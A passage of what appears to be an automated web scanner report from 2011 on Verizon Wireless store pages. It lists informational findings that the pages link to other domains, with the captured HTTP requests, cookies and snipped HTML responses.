           <a href="http://aboutus.vzw.com/securecode/mastercard.html" onclick="popUp(this.href,'popup',600,593);return false;"><img src="http://cache.vzw.com/images_b2c/shared/mcsclogo.jpg" height="50" width="80" alt="MasterCard SecureCode" /></a>
...[SNIP]...
</script>


   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbx.js">
</script>


<script type='text/javascript' src='http://cache.vzw.com/dwr/interface/Timer.js'></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://cache.vzw.com/dwr/dwrUtil.js'></script>
...[SNIP]...
</script>
   
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/customnote.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/lib.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/layers.js"></script>
...[SNIP]...
</script>
       
       <script type="text/javascript" charset="windows-1252" src="http://cache.vzw.com/onlineopinionV5/oo_engine.min.js"></script>
       <script type="text/javascript" charset="windows-1252" src="http://cache.vzw.com/onlineopinionV5/oo_conf.js"></script>
...[SNIP]...
</iframe>
<script type="text/javascript" src="https://stags.bluekai.com/js/bk-static-secure.js"></script>
...[SNIP]...

3.5. http://www.verizonwireless.com/b2c/store/controller  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verizonwireless.com
Path:   /b2c/store/controller

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /b2c/store/controller?item=phoneFirst&action=viewShopIndex HTTP/1.1
Host: www.verizonwireless.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: GLOBALID=U0rDszSw9SV68cj1hODGnDTHalYNM%2FB%2FuJn%2B7rVAcc%2Fc6GD2xpZ0%2Bs4Orh8A1O1u; mbox=PC#1310569554435-90226.17#1312204578|session#1310993870949-319721#1310996838|check#true#1310995038; CP=null*; __utma=96859928.1761841238.1310569615.1310569615.1310993885.2; __utmz=96859928.1310993885.2.2.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral; NSC_xxx_hwt=ffffffffa17b0cd945525d5f4f58455e445a4a420000; JSESSIONIDB2C=m2QBTktQzDgLsGGkf18drMdNkvTHdlJhykC5DM7rpkj8rQVPBXVy!-1801843931!mercury!5102!-1; SESSION_VALUE=m2QBTktQzDgLsGGkf18drMdNkvTHdlJhykC5DM7rpkj8rQVPBXVy!-1801843931!mercury!5102!-1!1310993856497; TIME_CHECKER=1310993856500; NSC_xxx_xmt_c2d_mcwt=ffffffff09f7172a45525d5f4f58455e445a4a4225de; gnVersion=2011Jul12104957; __utmb=96859928; __utmc=96859928; chkcookie=1310993892258; CARTVIEW=FALSE; ZIPCODE=10010; CITY=New York; STATE=NY; devicePageView=list

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date: Mon, 18 Jul 2011 13:17:47 GMT
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 17 Sept 2000 12:00:00 GMT
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 26926

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


                                   <html xmlns="http://www.w3.org/1999/xhtml" lang="en-us" xm
...[SNIP]...
<meta http-equiv="imagetoolbar" content="no" />
   
   <link rel="stylesheet" type="text/css" href="http://cache.vzw.com/stylesheets/layout.css?v=11-07" />
   <link rel="stylesheet" type="text/css" href="http://cache.vzw.com/stylesheets/fonts.css?v=11-07" />
   <link rel="stylesheet" type="text/css" href="http://cache.vzw.com/stylesheets/ecom.css?v=11-07" />
   
   
               <link rel="stylesheet" type="text/css" href="http://cache.vzw.com/stylesheets/vzw_jquery.css" />    
   
   <link rel="stylesheet" href="http://cache.vzw.com/globalnav/css/globalnav-js.css?v=11-07" />
   <!--[if lte IE 6]>
...[SNIP]...
<![endif]-->


   <link rel="stylesheet" media="print" type="text/css" href="http://cache.vzw.com/stylesheets/accessiblePrint.css" />


   <link rel="stylesheet" type="text/css" href="http://cache.vzw.com/onlineopinionV5/oo_style.css" />


   <script type="text/javascript">
...[SNIP]...
</script>
   
   
           <script type="text/javascript" src="http://cache.vzw.com/scripts/vzw_jquery.js"></script>        
   
   
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/mootools131.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/globalnav/globalnav.js?v=11-07"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/mootools131more.js"></script>
   
   <script type="text/javascript" src="http://cache.vzw.com/scripts/homepage/swfobject.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/library.js?v=11-07"></script>
   
   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbxVariables.js"> </script>
   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbxFunctions.js"> </script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/offermatica/mbox.js"></script>

   
       <script type="text/javascript" src="http://cache.vzw.com/scripts/liveperson/mtagconfig.js"></script>
...[SNIP]...
</script>


                   <link rel="stylesheet" type="text/css" href="http://cache.vzw.com/stylesheets/s11.css" />
   <script type="text/javascript" src="http://cache.vzw.com/scripts/s11.js"></script>
...[SNIP]...
<a href="/b2c/store/controller?item=phoneFirst&amp;action=viewPhoneOverviewByDevice&amp;deviceCategoryId=1"><img src="http://cache.vzw.com/images_b2c/shop/shopLandingDevice1.jpg" alt="" /></a>
...[SNIP]...
<a href="/b2c/store/controller?item=phoneFirst&amp;action=viewPhoneOverviewByDevice&amp;deviceCategoryId=2"><img src="http://cache.vzw.com/images_b2c/shop/shopLandingDevice2.jpg" alt="" /></a>
...[SNIP]...
<a href="/b2c/store/controller?item=phoneFirst&amp;action=viewPhoneOverviewByDevice&amp;deviceCategoryId=12"><img src="http://cache.vzw.com/images_b2c/shop/shopLandingDevice3.jpg" alt="" /></a>
...[SNIP]...
<a href="/b2c/store/controller?item=phoneFirst&amp;action=viewPhoneOverviewByDevice&amp;deviceCategoryId=13"><img src="http://cache.vzw.com/images_b2c/shop/shopLandingDevice4.jpg" alt="" /></a>
...[SNIP]...
<a href="/b2c/store/controller?item=phoneFirst&amp;action=viewPhoneOverviewByDevice&amp;deviceCategoryId=15"><img src="http://cache.vzw.com/images_b2c/shop/shopLandingDevice5.jpg" alt="" /></a>
...[SNIP]...
<a href="/b2c/splash/prepay.jsp"><img src="http://cache.vzw.com/images_b2c/shop/shopLandingDevice6.jpg" alt="" /></a>
...[SNIP]...
<a href="/b2c/promo/splash/ewp?v=16"><img src="http://cache.vzw.com/images_b2c/shop/shopLandingDeals1.jpg" alt="" /></a>
...[SNIP]...
<a href="/b2c/store/controller?&amp;item=packageItem&amp;action=viewPackageOverview"><img src="http://cache.vzw.com/images_b2c/shop/shopLandingDeals2.jpg" alt="" /></a>
...[SNIP]...
<a href="/b2c/splash/preowned.jsp"><img src="http://cache.vzw.com/images_b2c/shop/shopLandingDeals3.jpg" alt="" /></a>
...[SNIP]...
<a href="/b2c/employee/emaildomainauthentication.jsp"><img src="http://cache.vzw.com/images_b2c/shop/shopLandingDeals4.jpg" alt="" /></a>
...[SNIP]...
<a href="/b2c/store/accessory?action=refineByCategory&amp;categoryId=12"><img src="http://cache.vzw.com/images_b2c/shop/shopAcc1.jpg" alt="" /></a>
...[SNIP]...
<a href="/b2c/store/accessory?action=refineByCategory&amp;categoryId=17"><img src="http://cache.vzw.com/images_b2c/shop/shopAcc2.jpg" alt="" /></a>
...[SNIP]...
<a href="/b2c/store/accessory?action=refineByCategory&amp;categoryId=18"><img src="http://cache.vzw.com/images_b2c/shop/shopAcc3.jpg" alt="" /></a>
...[SNIP]...
<a href="/b2c/store/accessory?action=refineByCategory&amp;categoryId=19"><img src="http://cache.vzw.com/images_b2c/shop/shopAcc4.jpg" alt="" /></a>
...[SNIP]...
<a href="/b2c/store/accessory?action=refineByCategory&amp;categoryId=21"><img src="http://cache.vzw.com/images_b2c/shop/shopAcc5.jpg" alt="" /></a>
...[SNIP]...
<a href="/b2c/store/accessory?action=refineByCategory&amp;categoryId=20"><img src="http://cache.vzw.com/images_b2c/shop/shopAcc6.jpg" alt="" /></a>
...[SNIP]...
<a href="http://products.verizonwireless.com/index.aspx?id=fnd_music"><img src="http://cache.vzw.com/images_b2c/shop/shopMedia1.jpg" alt="" /></a>
...[SNIP]...
<a href="http://products.verizonwireless.com/index.aspx?id=fnd_video"><img src="http://cache.vzw.com/images_b2c/shop/shopMedia2.jpg" alt="" /></a>
...[SNIP]...
<a href="http://mediastore.verizonwireless.com/onlineContentStore/index.html#apps=home"><img src="http://cache.vzw.com/images_b2c/shop/shopMedia3.jpg" alt="" /></a>
...[SNIP]...
<a href="http://mediastore.verizonwireless.com/onlineContentStore/index.html#games=home"><img src="http://cache.vzw.com/images_b2c/shop/shopMedia4.jpg" alt="" /></a>
...[SNIP]...
<div class="leftAligned indent70">
       <img src="http://cache.vzw.com/images_b2c/shop/shopTout1.jpg" alt="" />
</div>
...[SNIP]...
<div class="leftAligned indent40">
       <img src="http://cache.vzw.com/images_b2c/shop/shopTout2.jpg" alt="" />
</div>
...[SNIP]...
</span>


                                                                           <a href="http://www22.verizon.com/privacy/">Privacy</a>
...[SNIP]...
</span>
       <a href="http://business.verizon.net" onclick="popUp(this.href,'popup',400,500);return false;">Small Business Center</a>
...[SNIP]...
</span>
       <a href="http://www.trade-in.vzw.com">Trade-In Program</a>
...[SNIP]...
<div class="footerIcons">
           <script src="https://seal.verisign.com/getseal?host_name=www.verizonwireless.com&amp;size=S&amp;use_flash=NO&amp;use_transparent=NO&amp;lang=en" type="text/javascript"></script>
           
           <a href="http://www.verizonwireless.com/b2c/globalText?contentType=globalContent"><img src="http://cache.vzw.com/images_b2c/shared/nav/finalmark.gif" alt="TRUST-e Privacy" height="72" width="125" /></a>
           
           <a href="http://www.bbbonline.org/cks.asp?id=10305271131732383" onclick="popUp(this.href,'popup',450,300);return false;"><img src="http://cache.vzw.com/images_b2c/shared/nav/bbb_online.gif" height="72" width="103" alt="BBB Accredited Business" /></a>
           
           <a href="http://aboutus.vzw.com/securecode/visa.html" onclick="popUp(this.href,'popup',600,593);return false;"><img src="http://cache.vzw.com/images_b2c/shared/vbvlogo.jpg" height="52" width="79" alt="Verified by Visa" /></a>
           <a href="http://aboutus.vzw.com/securecode/mastercard.html" onclick="popUp(this.href,'popup',600,593);return false;"><img src="http://cache.vzw.com/images_b2c/shared/mcsclogo.jpg" height="50" width="80" alt="MasterCard SecureCode" /></a>
...[SNIP]...
</script>


   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbx.js">
</script>


<script type='text/javascript' src='http://cache.vzw.com/dwr/interface/Timer.js'></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://cache.vzw.com/dwr/dwrUtil.js'></script>
...[SNIP]...
</script>
   
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/customnote.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/lib.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/layers.js"></script>
...[SNIP]...
</script>
       
       <script type="text/javascript" charset="windows-1252" src="http://cache.vzw.com/onlineopinionV5/oo_engine.min.js"></script>
       <script type="text/javascript" charset="windows-1252" src="http://cache.vzw.com/onlineopinionV5/oo_conf.js"></script>
...[SNIP]...

3.6. http://www.verizonwireless.com/b2c/store/controller  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verizonwireless.com
Path:   /b2c/store/controller

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /b2c/store/controller?item=phoneFirst&action=viewPhoneOverviewByDevice&deviceCategoryId=15 HTTP/1.1
Host: www.verizonwireless.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/store/controller?item=phoneFirst&action=viewShopIndex
Cookie: GLOBALID=U0rDszSw9SV68cj1hODGnDTHalYNM%2FB%2FuJn%2B7rVAcc%2Fc6GD2xpZ0%2Bs4Orh8A1O1u; mbox=PC#1310569554435-90226.17#1312204678|session#1310993870949-319721#1310996938|check#true#1310995138; CP=null*; __utma=96859928.1761841238.1310569615.1310569615.1310993885.2; __utmz=96859928.1310993885.2.2.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral; NSC_xxx_hwt=ffffffffa17b0cd945525d5f4f58455e445a4a420000; JSESSIONIDB2C=m2QBTktQzDgLsGGkf18drMdNkvTHdlJhykC5DM7rpkj8rQVPBXVy!-1801843931!mercury!5102!-1; SESSION_VALUE=m2QBTktQzDgLsGGkf18drMdNkvTHdlJhykC5DM7rpkj8rQVPBXVy!-1801843931!mercury!5102!-1!1310993856497; TIME_CHECKER=1310993856500; NSC_xxx_xmt_c2d_mcwt=ffffffff09f7172a45525d5f4f58455e445a4a4225de; gnVersion=2011Jul12104957; __utmb=96859928; __utmc=96859928; chkcookie=1310993892258; CARTVIEW=FALSE; ZIPCODE=10010; CITY=New York; STATE=NY; devicePageView=list

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date: Mon, 18 Jul 2011 13:18:39 GMT
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 17 Sept 2000 12:00:00 GMT
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 83874

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


                                <html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
<meta http-equiv="imagetoolbar" content="no" />
   
   <link rel="stylesheet" type="text/css" href="http://cache.vzw.com/stylesheets/layout.css?v=11-07" />
   <link rel="stylesheet" type="text/css" href="http://cache.vzw.com/stylesheets/fonts.css?v=11-07" />
   <link rel="stylesheet" type="text/css" href="http://cache.vzw.com/stylesheets/ecom.css?v=11-07" />
   
   
               <link rel="stylesheet" type="text/css" href="http://cache.vzw.com/stylesheets/vzw_jquery.css" />    
   
   <link rel="stylesheet" href="http://cache.vzw.com/globalnav/css/globalnav-js.css?v=11-07" />
   <!--[if lte IE 6]>
...[SNIP]...
<![endif]-->


   <link rel="stylesheet" media="print" type="text/css" href="http://cache.vzw.com/stylesheets/accessiblePrint.css" />


   <link rel="stylesheet" type="text/css" href="http://cache.vzw.com/onlineopinionV5/oo_style.css" />


   <script type="text/javascript">
...[SNIP]...
</script>
   
   
           <script type="text/javascript" src="http://cache.vzw.com/scripts/vzw_jquery.js"></script>        
   
   
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/mootools131.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/globalnav/globalnav.js?v=11-07"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/mootools131more.js"></script>
   
   <script type="text/javascript" src="http://cache.vzw.com/scripts/homepage/swfobject.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/library.js?v=11-07"></script>
   
   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbxVariables.js"> </script>
   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbxFunctions.js"> </script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/offermatica/mbox.js"></script>

   
       <script type="text/javascript" src="http://cache.vzw.com/scripts/liveperson/mtagconfig.js"></script>
...[SNIP]...
</script>

   <script type='text/javascript' src='http://cache.vzw.com/dwr/dwrUtil.js'></script>
...[SNIP]...
</script>
   <script type='text/javascript' src='http://cache.vzw.com/dwr/util.js'></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/offermatica/mbox.js"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/store/phones_devices.js"></script>
...[SNIP]...
oneFirst&amp;closeUrl=%2Fb2c%2Fstore%2Fcontroller%3Fitem%3DphoneFirst%26action%3DviewPhoneOverviewByDevice%26backTo%3Dtrue&amp;action=viewWishList" title="Wish List" style="display:inline !important;"><img src="http://cache.vzw.com/images_b2c/wishlist/wishlist.gif" alt="Wish List" style="display:inline !important; margin-top:15px;" /></a>
...[SNIP]...
<div class="rightAligned">
                   <a class="actionLink" title="Trade-In Program" href="http://www.trade-in.vzw.com">Trade-In Program</a>
...[SNIP]...
<a class="compareBox" rel="">
       <img class="pngOmit" src="http://cache.vzw.com/images_b2c/shared/trans.gif" />
       <span class="remove">
...[SNIP]...
<a class="compareBox" rel="">
       <img class="pngOmit" src="http://cache.vzw.com/images_b2c/shared/trans.gif" />
       <span class="remove">
...[SNIP]...
<a class="compareBox" rel="">
       <img class="pngOmit" src="http://cache.vzw.com/images_b2c/shared/trans.gif" />
       <span class="remove">
...[SNIP]...
<a class="compareBox" rel="">
       <img class="pngOmit" src="http://cache.vzw.com/images_b2c/shared/trans.gif" />
       <span class="remove">
...[SNIP]...
<a class="compareBox" rel="">
       <img class="pngOmit" src="http://cache.vzw.com/images_b2c/shared/trans.gif" />
       <span class="remove">
...[SNIP]...
<a href="/b2c/store/controller?item=phoneFirst&amp;action=viewPhoneDetail&amp;selectedPhoneId=5632&amp;deviceCategoryId=15"><img id="image_5632" src="http://cache.vzw.com/images_b2c/phones/med/vzw_lte_usb_551l_modem.png" alt="" class="png medium" /></a>
...[SNIP]...
<a href="/b2c/store/controller?item=phoneFirst&amp;action=viewPhoneDetail&amp;selectedPhoneId=5537&amp;deviceCategoryId=15"><img id="image_5537" src="http://cache.vzw.com/images_b2c/phones/med/uml290_usb_modem.png" alt="" class="png medium" /></a>
...[SNIP]...
<a href="/b2c/store/controller?item=phoneFirst&amp;action=viewPhoneDetail&amp;selectedPhoneId=5674&amp;deviceCategoryId=15"><img id="image_5674" src="http://cache.vzw.com/images_b2c/phones/med/uml290_usb_modem_cpo.png" alt="" class="png medium" /></a>
...[SNIP]...
<a class="compareBox" rel="">
       <img class="pngOmit" src="http://cache.vzw.com/images_b2c/shared/trans.gif" />
       <span class="remove">
...[SNIP]...
<a class="compareBox" rel="">
       <img class="pngOmit" src="http://cache.vzw.com/images_b2c/shared/trans.gif" />
       <span class="remove">
...[SNIP]...
<a class="compareBox" rel="">
       <img class="pngOmit" src="http://cache.vzw.com/images_b2c/shared/trans.gif" />
       <span class="remove">
...[SNIP]...
<a class="compareBox" rel="">
       <img class="pngOmit" src="http://cache.vzw.com/images_b2c/shared/trans.gif" />
       <span class="remove">
...[SNIP]...
<a class="compareBox" rel="">
       <img class="pngOmit" src="http://cache.vzw.com/images_b2c/shared/trans.gif" />
       <span class="remove">
...[SNIP]...
<div class="left">

                           <img src="http://cache.vzw.com/images_b2c/hot_deals/splash_images/trade_in_program.png" alt="Trade&ndash;In Program" />
                       
                       </div>
...[SNIP]...
</div>

                               
                                                                                                                               <a name="&lid=Trade&amp;ndash;In Program" href="http://www.trade-in.vzw.com" title="Details" class="boldLink">Details</a>
...[SNIP]...
<div class="left">

                           <img src="http://cache.vzw.com/images_b2c/hot_deals/splash_images/20percent_off_accessories.png" alt="Up to 25% off Accessories" />
                       
                       </div>
...[SNIP]...
<div class="left">

                           <img src="http://cache.vzw.com/images_b2c/hot_deals/splash_images/free_act_special.png" alt="Free Activation" />
                       
                       </div>
...[SNIP]...
<noscript> <iframe src="https://fls.doubleclick.net/activityi;src=685973;type=vzwbu139;cat=vzwph183;ord=0123456789?" width="1" height="1" frameborder="0"></iframe>
...[SNIP]...
</span>


                                                                           <a href="http://www22.verizon.com/privacy/">Privacy</a>
...[SNIP]...
</span>
       <a href="http://business.verizon.net" onclick="popUp(this.href,'popup',400,500);return false;">Small Business Center</a>
...[SNIP]...
</span>
       <a href="http://www.trade-in.vzw.com">Trade-In Program</a>
...[SNIP]...
<div class="footerIcons">
           <script src="https://seal.verisign.com/getseal?host_name=www.verizonwireless.com&amp;size=S&amp;use_flash=NO&amp;use_transparent=NO&amp;lang=en" type="text/javascript"></script>
           
           <a href="http://www.verizonwireless.com/b2c/globalText?contentType=globalContent"><img src="http://cache.vzw.com/images_b2c/shared/nav/finalmark.gif" alt="TRUST-e Privacy" height="72" width="125" /></a>
           
           <a href="http://www.bbbonline.org/cks.asp?id=10305271131732383" onclick="popUp(this.href,'popup',450,300);return false;"><img src="http://cache.vzw.com/images_b2c/shared/nav/bbb_online.gif" height="72" width="103" alt="BBB Accredited Business" /></a>
           
           <a href="http://aboutus.vzw.com/securecode/visa.html" onclick="popUp(this.href,'popup',600,593);return false;"><img src="http://cache.vzw.com/images_b2c/shared/vbvlogo.jpg" height="52" width="79" alt="Verified by Visa" /></a>
           <a href="http://aboutus.vzw.com/securecode/mastercard.html" onclick="popUp(this.href,'popup',600,593);return false;"><img src="http://cache.vzw.com/images_b2c/shared/mcsclogo.jpg" height="50" width="80" alt="MasterCard SecureCode" /></a>
...[SNIP]...
</script>


   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbx.js">
</script>


<script type='text/javascript' src='http://cache.vzw.com/dwr/interface/Timer.js'></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://cache.vzw.com/dwr/dwrUtil.js'></script>
...[SNIP]...
</script>
   
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/customnote.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/lib.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/layers.js"></script>
...[SNIP]...
</script>
       
       <script type="text/javascript" charset="windows-1252" src="http://cache.vzw.com/onlineopinionV5/oo_engine.min.js"></script>
       <script type="text/javascript" charset="windows-1252" src="http://cache.vzw.com/onlineopinionV5/oo_conf.js"></script>
...[SNIP]...

3.7. http://www.verizonwireless.com/b2c/store/controller  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verizonwireless.com
Path:   /b2c/store/controller

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /b2c/store/controller?item=phoneFirst&action=viewPhoneOverviewByDevice&deviceCategoryId=12&lid=//global//shop//phones+and+devices//tablets HTTP/1.1
Host: www.verizonwireless.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/explore/
Cookie: GLOBALID=U0rDszSw9SV68cj1hODGnDTHalYNM%2FB%2FuJn%2B7rVAcc%2Fc6GD2xpZ0%2Bs4Orh8A1O1u; mbox=PC#1310569554435-90226.17#1312204559|session#1310993870949-319721#1310996819|check#true#1310995019; CP=null*; __utma=96859928.1761841238.1310569615.1310569615.1310993885.2; __utmz=96859928.1310993885.2.2.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral; NSC_xxx_hwt=ffffffffa17b0cd945525d5f4f58455e445a4a420000; JSESSIONIDB2C=m2QBTktQzDgLsGGkf18drMdNkvTHdlJhykC5DM7rpkj8rQVPBXVy!-1801843931!mercury!5102!-1; SESSION_VALUE=m2QBTktQzDgLsGGkf18drMdNkvTHdlJhykC5DM7rpkj8rQVPBXVy!-1801843931!mercury!5102!-1!1310993856497; TIME_CHECKER=1310993856500; NSC_xxx_xmt_c2d_mcwt=ffffffff09f7172a45525d5f4f58455e445a4a4225de; gnVersion=2011Jul12104957; __utmb=96859928; __utmc=96859928; chkcookie=1310993892258; CARTVIEW=FALSE; ZIPCODE=10010; CITY=New York; STATE=NY

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date: Mon, 18 Jul 2011 13:16:08 GMT
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 17 Sept 2000 12:00:00 GMT
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 79525

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


                                <html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
<meta http-equiv="imagetoolbar" content="no" />
   
   <link rel="stylesheet" type="text/css" href="http://cache.vzw.com/stylesheets/layout.css?v=11-07" />
   <link rel="stylesheet" type="text/css" href="http://cache.vzw.com/stylesheets/fonts.css?v=11-07" />
   <link rel="stylesheet" type="text/css" href="http://cache.vzw.com/stylesheets/ecom.css?v=11-07" />
   
   
               <link rel="stylesheet" type="text/css" href="http://cache.vzw.com/stylesheets/vzw_jquery.css" />    
   
   <link rel="stylesheet" href="http://cache.vzw.com/globalnav/css/globalnav-js.css?v=11-07" />
   <!--[if lte IE 6]>
...[SNIP]...
<![endif]-->


   <link rel="stylesheet" media="print" type="text/css" href="http://cache.vzw.com/stylesheets/accessiblePrint.css" />


   <link rel="stylesheet" type="text/css" href="http://cache.vzw.com/onlineopinionV5/oo_style.css" />


   <script type="text/javascript">
...[SNIP]...
</script>
   
   
           <script type="text/javascript" src="http://cache.vzw.com/scripts/vzw_jquery.js"></script>        
   
   
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/mootools131.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/globalnav/globalnav.js?v=11-07"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/mootools131more.js"></script>
   
   <script type="text/javascript" src="http://cache.vzw.com/scripts/homepage/swfobject.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/library.js?v=11-07"></script>
   
   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbxVariables.js"> </script>
   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbxFunctions.js"> </script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/offermatica/mbox.js"></script>

   
       <script type="text/javascript" src="http://cache.vzw.com/scripts/liveperson/mtagconfig.js"></script>
...[SNIP]...
</script>

   <script type='text/javascript' src='http://cache.vzw.com/dwr/dwrUtil.js'></script>
...[SNIP]...
</script>
   <script type='text/javascript' src='http://cache.vzw.com/dwr/util.js'></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/offermatica/mbox.js"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/store/phones_devices.js"></script>
...[SNIP]...
oneFirst&amp;closeUrl=%2Fb2c%2Fstore%2Fcontroller%3Fitem%3DphoneFirst%26action%3DviewPhoneOverviewByDevice%26backTo%3Dtrue&amp;action=viewWishList" title="Wish List" style="display:inline !important;"><img src="http://cache.vzw.com/images_b2c/wishlist/wishlist.gif" alt="Wish List" style="display:inline !important; margin-top:15px;" /></a>
...[SNIP]...
<div class="rightAligned">
                   <a class="actionLink" title="Trade-In Program" href="http://www.trade-in.vzw.com">Trade-In Program</a>
...[SNIP]...
<a class="compareBox" rel="">
       <img class="pngOmit" src="http://cache.vzw.com/images_b2c/shared/trans.gif" />
       <span class="remove">
...[SNIP]...
<a class="compareBox" rel="">
       <img class="pngOmit" src="http://cache.vzw.com/images_b2c/shared/trans.gif" />
       <span class="remove">
...[SNIP]...
<a class="compareBox" rel="">
       <img class="pngOmit" src="http://cache.vzw.com/images_b2c/shared/trans.gif" />
       <span class="remove">
...[SNIP]...
<a class="compareBox" rel="">
       <img class="pngOmit" src="http://cache.vzw.com/images_b2c/shared/trans.gif" />
       <span class="remove">
...[SNIP]...
<a class="compareBox" rel="">
       <img class="pngOmit" src="http://cache.vzw.com/images_b2c/shared/trans.gif" />
       <span class="remove">
...[SNIP]...
<a href="/b2c/store/controller?item=phoneFirst&amp;action=viewPhoneDetail&amp;selectedPhoneId=5669&amp;deviceCategoryId=12"><img id="image_5669" src="http://cache.vzw.com/images_b2c/phones/med/sam_galaxy_tab_10.png" alt="" class="png medium" /></a>
...[SNIP]...
<a href="/b2c/store/controller?item=phoneFirst&amp;action=viewPhoneDetail&amp;selectedPhoneId=5672&amp;deviceCategoryId=12"><img id="image_5672" src="http://cache.vzw.com/images_b2c/phones/med/sam_galaxy_tab_10.png" alt="" class="png medium" /></a>
...[SNIP]...
<a href="/b2c/store/controller?item=phoneFirst&amp;action=viewPhoneDetail&amp;selectedPhoneId=5623&amp;deviceCategoryId=12"><img id="image_5623" src="http://cache.vzw.com/images_b2c/phones/med/apple_ipad2_white.png" alt="" class="png medium" /></a>
...[SNIP]...
<a class="compareBox" rel="">
       <img class="pngOmit" src="http://cache.vzw.com/images_b2c/shared/trans.gif" />
       <span class="remove">
...[SNIP]...
<a class="compareBox" rel="">
